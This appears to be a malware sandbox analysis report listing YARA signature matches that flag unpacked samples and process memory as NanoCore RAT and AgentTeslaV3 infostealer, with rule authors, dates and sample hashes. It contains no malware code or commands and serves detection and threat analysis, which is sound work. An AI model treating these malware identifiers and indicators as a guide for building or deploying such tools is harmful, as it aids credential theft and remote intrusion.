                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.TM57812337.exe.3637b90.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.5cd0000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 12.3.Qqsucntzxgqwkiqkvrafiufflip.exe.3ef0b30.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.5cd0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 33.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.3.TM57812337.exe.36a8e60.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 0.3.TM57812337.exe.3688e40.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 12.3.Qqsucntzxgqwkiqkvrafiufflip.exe.3fb0b70.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 15.3.Qjarsxlh.exe.4468e40.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 0.3.TM57812337.exe.3768ea0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 0000000C.00000002.476919142.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 00000020.00000002.491043035.0000000006090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 00000020.00000002.491043035.0000000006090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
                Source: 00000000.00000002.360544284.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 00000020.00000000.473733509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 00000020.00000000.473733509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000020.00000002.490004111.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000020.00000000.472431522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 00000020.00000000.472431522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000020.00000002.488350765.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 00000020.00000002.488350765.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000020.00000000.472817757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 00000020.00000000.472817757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000010.00000002.508484748.00000000059F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 00000020.00000000.473252440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 00000020.00000000.473252440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000C.00000002.475784725.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 0000000C.00000002.475784725.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000F.00000002.491110453.00000000061C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 0000000C.00000002.476158261.0000000003F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 0000000C.00000002.476158261.0000000003F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000022.00000002.541013237.00000000057B0000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                Source: 00000020.00000002.490307943.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000C.00000002.476008629.0000000003E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 0000000C.00000002.476008629.0000000003E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000C.00000002.475883360.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: 0000000C.00000002.475883360.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: Process Memory Space: Qqsucntzxgqwkiqkvrafiufflip.exe PID: 6528, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: Process Memory Space: Qqsucntzxgqwkiqkvrafiufflip.exe PID: 6528, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: Process Memory Space: InstallUtil.exe PID: 6288, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                Source: Process Memory Space: InstallUtil.exe PID: 6288, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                Source: 14.2.InstallUtil.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE2C34736u002d527Eu002d4794u002dB3F0u002dBD5D775AA8CCu007d/AD749466u002d0ECBu002d402Du002dA6BCu002dBD352FE44402.csLarge array initialization: .cctor: array initializer size 11649
                Source: 14.0.InstallUtil.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bE2C34736u002d527Eu002d4794u002dB3F0u002dBD5D775AA8CCu007d/AD749466u002d0ECBu002d402Du002dA6BCu002dBD352FE44402.csLarge array initialization: .cctor: array initializer size 11649
                Source: 14.0.InstallUtil.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bE2C34736u002d527Eu002d4794u002dB3F0u002dBD5D775AA8CCu007d/AD749466u002d0ECBu002d402Du002dA6BCu002dBD352FE44402.csLarge array initialization: .cctor: array initializer size 11649
                Source: 14.0.InstallUtil.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE2C34736u002d527Eu002d4794u002dB3F0u002dBD5D775AA8CCu007d/AD749466u002d0ECBu002d402Du002dA6BCu002dBD352FE44402.csLarge array initialization: .cctor: array initializer size 11649
                Source: 14.0.InstallUtil.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bE2C34736u002d527Eu002d4794u002dB3F0u002dBD5D775AA8CCu007d/AD749466u002d0ECBu002d402Du002dA6BCu002dBD352FE44402.csLarge array initialization: .cctor: array initializer size 11649
                Source: 14.0.InstallUtil.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bE2C34736u002d527Eu002d4794u002dB3F0u002dBD5D775AA8CCu007d/AD749466u002d0ECBu002d402Du002dA6BCu002dBD352FE44402.csLarge array initialization: .cctor: array initializer size 11649
                Source: TM57812337.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 15.3.Qjarsxlh.exe.4548ea0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 15.2.Qjarsxlh.exe.61c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 0.2.TM57812337.exe.52c0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 16.2.Qjarsxlh.exe.59f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 16.3.Qjarsxlh.exe.3c38e80.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 15.3.Qjarsxlh.exe.4488e60.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 33.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 32.2.InstallUtil.exe.3fb455d.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 32.2.InstallUtil.exe.3fb455d.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 32.2.InstallUtil.exe.3fb455d.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 16.2.Qjarsxlh.exe.3b87b90.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.3.TM57812337.exe.36e8e80.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 33.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 15.3.Qjarsxlh.exe.4548ea0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 12.3.Qqsucntzxgqwkiqkvrafiufflip.exe.3ed0b10.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 0.2.TM57812337.exe.52c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 15.3.Qjarsxlh.exe.44c8e80.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 12.3.Qqsucntzxgqwkiqkvrafiufflip.exe.3fb0b70.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 33.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 32.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 32.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 32.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 32.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 15.2.Qjarsxlh.exe.61c0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 16.3.Qjarsxlh.exe.3c38e80.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 16.3.Qjarsxlh.exe.3bf8e60.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 15.2.Qjarsxlh.exe.4417b90.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 32.2.InstallUtil.exe.2fcb430.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 32.2.InstallUtil.exe.2fcb430.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 32.2.InstallUtil.exe.2fcb430.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 16.3.Qjarsxlh.exe.3bd8e40.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 32.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 32.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 32.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 32.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 16.2.Qjarsxlh.exe.3b87b90.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.3.TM57812337.exe.3768ea0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 15.3.Qjarsxlh.exe.44c8e80.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 32.2.InstallUtil.exe.6090000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 32.2.InstallUtil.exe.6090000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 32.2.InstallUtil.exe.6090000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 32.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 32.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 32.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 32.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 32.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 32.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 32.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 32.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 33.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 32.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 32.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 32.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 32.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 16.3.Qjarsxlh.exe.3cb8ea0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 16.3.Qjarsxlh.exe.3cb8ea0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
